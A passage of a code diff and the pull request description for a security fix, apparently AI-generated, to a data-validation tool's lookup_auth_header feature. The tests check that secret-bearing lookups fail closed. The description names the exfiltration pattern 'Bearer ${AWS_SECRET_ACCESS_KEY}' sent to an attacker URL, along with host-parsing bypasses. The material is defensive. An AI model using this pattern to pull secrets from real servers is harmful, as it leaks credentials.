+                      lookup_auth_header="Bearer ${SECRET_KEY}",
+                      error_message="lookup unavailable")]
+        result = validate_record({"x": "anything"}, rules)
+        assert result["valid"] is False
+
+    def test_batch_lookup_policy_violation_fails_closed(self, token_mode,
+                                                        allow_api_example, monkeypatch):
+        # The batch path historically fails OPEN on infra errors; a SEC-011
+        # policy violation must instead fail CLOSED — every record subject to the
+        # rule is marked failing, not silently skipped.
+        pytest.importorskip("duckdb")
+        from opendqv.core.validator import validate_batch
+        from opendqv.core.rule_parser import Rule
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        records = [{"x": "a"}, {"x": "b"}]
+        rules = [Rule(name="r", type="lookup", field="x",
+                      lookup_file="https://api.example/list",
+                      lookup_auth_header="Bearer ${SECRET_KEY}",
+                      error_message="lookup unavailable")]
+        result = validate_batch(records, rules)
+        assert result["summary"]["failed"] == 2, "policy violation must fail all records closed"
+        assert result["results"][0]["valid"] is False
+        assert result["results"][1]["valid"] is False


### PR DESCRIPTION
## SEC-011 — `lookup_auth_header` environment-variable exfiltration (CWE-526)

`lookup_auth_header` expanded `${VAR}` references against the entire process
environment into an outbound `Authorization` header. A contract author controls
both the header template and the destination URL — and under `AUTH_MODE=open`
(the shipped default) the `editor` role gate is a no-op — so
`Bearer ${AWS_SECRET_ACCESS_KEY}` + a public attacker URL exfiltrated any server
secret (JWT signing key, DB creds, cloud keys). The SEC-008 SSRF guard does not
help: the destination is a legitimate public host; the leak is the credential in
the header, not the network path.

### Fix — three layered, fail-closed controls

1. **Prefix allowlist** — only `OPENDQV_LOOKUP_*` env vars are substitutable; any
   other name fails the lookup (no silent empty string).
2. **`AUTH_MODE=open` posture** — substitution disabled entirely unless the
   operator sets `OPENDQV_ALLOW_LOOKUP_SECRETS`.
3. **Egress domain allowlist** — a secret-bearing lookup host must be on
   `OPENDQV_LOOKUP_EGRESS_ALLOWLIST` (empty ⇒ fail-closed). Host taken from
   `urlparse().hostname`, IDNA-canonicalised (defeats case / trailing-dot /
   userinfo-`@` / punycode-homoglyph bypasses), userinfo rejected outright, and
   redirects not followed for secret-bearing lookups (OWASP).

Enforced at fetch time, so one malformed lookup rule fails only its own
validation and never drops a contract's other rules. The batch path fails
**closed** on a policy violation (distinct from its fail-open infra handling).

### Process

Design informed by industry prior art (dbt `DBT_ENV_SECRET_` prefix, GitHub
Actions fork-PR secret withholding, HashiCorp Vault, OWASP SSRF egress
allowlist). Adversarially red-teamed **before** implementation (which flipped the
primary control to the egress allowlist and forced the `AUTH_MODE=open`-default
reckoning) and **blind re-verified after** — verdict SOUND-WITH-NITS, no
exploitable bypass across six attack categories; the one real finding (a
`urlparse` vs `urllib.Request.host` userinfo differential, non-exploitable) was
closed at the source.

### Breaking change

Contracts using a bare `${VAR}` auth header (e.g. `"Bearer ${TOKEN}"`) now fail
closed. Rename the env var to the `OPENDQV_LOOKUP_` prefix, add the endpoint host
to `OPENDQV_LOOKUP_EGRESS_ALLOWLIST`, and — under `AUTH_MODE=open` — set
`OPENDQV_ALLOW_LOOKUP_SECRETS`. Literal (non-`${}`) auth headers are unaffected.
No bundled contract uses `lookup_auth_header`.

### Tests

25 new recurrence tests (`tests/test_v2_3_28_lookup_auth_sec011.py`). Full suite
green: 4181 passed, 23 skipped.

🤖 Generated with [Claude Code](https://claude.com/claude-code)